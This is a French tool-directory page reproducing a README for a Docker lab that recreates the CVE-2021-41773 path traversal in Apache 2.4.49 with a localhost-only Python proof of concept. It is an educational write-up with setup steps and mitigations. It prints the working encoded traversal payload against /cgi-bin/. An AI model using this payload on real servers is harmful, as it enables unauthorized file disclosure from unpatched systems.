Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773-Apache-Lab — Laboratoire basé sur Docker pour reproduire CVE-2021-41773 (Apache HTTP Server 2.4.49) via une traversée de chemin contrôlée et une divulgation de fichiers à l'aide d'un PoC Python personnalisé. | Kitploit
Outils/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

Laboratoire basé sur Docker pour reproduire CVE-2021-41773 (Apache HTTP Server 2.4.49) via une traversée de chemin contrôlée et une divulgation de fichiers à l'aide d'un PoC Python personnalisé.

Voir le dépôt
1il y a 28 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41773 — Laboratoire Apache HTTP Server 2.4.49

Reproduction de CVE-2021-41773, une vulnérabilité de traversée de chemin dans Apache HTTP Server 2.4.49.

Ce projet utilise Docker pour créer un environnement vulnérable isolé et un PoC Python pour démontrer la divulgation contrôlée de fichiers.

Sécurité : Le PoC n'accepte que les cibles localhost, 127.0.0.1 ou ::1. Les tests doivent rester dans le laboratoire isolé.

Objectif

Ce projet démontre :

  • Configuration d'Apache HTTP Server 2.4.49 dans Docker
  • Vérification de la version vulnérable d'Apache
  • Reproduction de CVE-2021-41773
  • Démonstration de la divulgation contrôlée de fichiers
  • Développement d'un PoC Python personnalisé
  • Collecte de preuves d'exploitation
  • Documentation des mesures d'atténuation

La démonstration se concentre sur la divulgation de fichiers plutôt que sur l'exécution de code à distance.

Structure du projet

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

Prérequis

  • Docker
  • Python 3.x
  • Git

Le PoC n'utilise que la bibliothèque standard de Python et ne nécessite aucun package Python tiers.

Configuration du laboratoire

1. Construire l'image Docker

Depuis la racine du dépôt :

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. Démarrer le serveur Apache vulnérable

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

Laissez ce terminal ouvert.

Le service Apache n'est exposé que via :

root@kitploit:~
127.0.0.1:8080

Vérification

Vérifier le conteneur

Dans un autre terminal :

root@kitploit:~
docker ps

Le conteneur doit afficher :

root@kitploit:~
127.0.0.1:8080->80/tcp

Vérifier la version d'Apache

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

Résultat attendu :

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

Vérifier l'accès HTTP normal

root@kitploit:~
curl http://127.0.0.1:8080/

La page de test Apache doit être renvoyée.

Exploitation

Le PoC se trouve dans :

root@kitploit:~
exploit/exploit.py

Exécutez :

root@kitploit:~
python3 exploit/exploit.py

La cible par défaut est :

root@kitploit:~
http://127.0.0.1:8080

Le fichier de preuve par défaut est :

root@kitploit:~
/lab/secret.txt

Une exécution réussie produit :

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

Le PoC affiche ensuite le contenu du fichier contrôlé du laboratoire.

Fonctionnement du PoC

Le PoC vérifie d'abord que la cible est une adresse locale :

root@kitploit:~
localhost
127.0.0.1
::1

Il construit ensuite un chemin contenant des composants de traversée encodés :

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

La requête est envoyée à l'aide du module socket standard de Python. Cela donne au PoC un contrôle direct sur le chemin de la requête HTTP.

Le serveur Apache 2.4.49 vulnérable traite le chemin forgé et renvoie le contenu de :

root@kitploit:~
/lab/secret.txt

La récupération de ce fichier confirme la traversée de chemin et la divulgation contrôlée de fichiers.

Résumé de la vulnérabilité

CVE : CVE-2021-41773

Produit : Apache HTTP Server

Version affectée démontrée : 2.4.49

Type de vulnérabilité : Traversée de chemin / Divulgation de fichiers

CVE-2021-41773 est une vulnérabilité de traversée de chemin dans Apache HTTP Server 2.4.49. Une URL spécialement conçue peut contourner les restrictions de chemin prévues et permettre l'accès à des fichiers en dehors du répertoire attendu.

Dans certaines configurations, la vulnérabilité peut avoir des conséquences plus graves. Ce projet démontre délibérément la divulgation contrôlée de fichiers dans un environnement Docker isolé.

Preuves

Les captures d'écran collectées lors des tests sont stockées dans :

root@kitploit:~
evidence/

Les preuves comprennent :

  1. Conteneur Docker en cours d'exécution
  2. Vérification de la version d'Apache HTTP Server 2.4.49
  3. Exécution réussie du PoC Python

Atténuation

La principale mesure d'atténuation consiste à mettre à niveau Apache HTTP Server vers une version corrigée.

Des mesures défensives supplémentaires incluent :

  • Maintenir Apache régulièrement patché.
  • Restreindre l'accès aux fichiers sensibles.
  • Réviser les configurations Alias et CGI.
  • Appliquer des permissions de moindre privilège.
  • Éviter d'exposer des services inutiles.
  • Surveiller les journaux du serveur pour détecter les requêtes suspectes de traversée de chemin.

Références

  • Avis de sécurité Apache HTTP Server : https://httpd.apache.org/security/vulnerabilities_24.html

  • Base nationale de données sur les vulnérabilités NIST : https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • Avis de sécurité CERT-EU : https://cert.europa.eu/publications/security-advisories/2021-054/

Avertissement

Ce projet est destiné uniquement à l'éducation à la sécurité autorisée et aux tests de laboratoire contrôlés.

L'environnement Docker et le PoC sont conçus pour des tests locaux. N'utilisez pas le PoC contre des systèmes que vous ne possédez pas ou que vous n'avez pas l'autorisation explicite d'évaluer.

Télécharger l’outil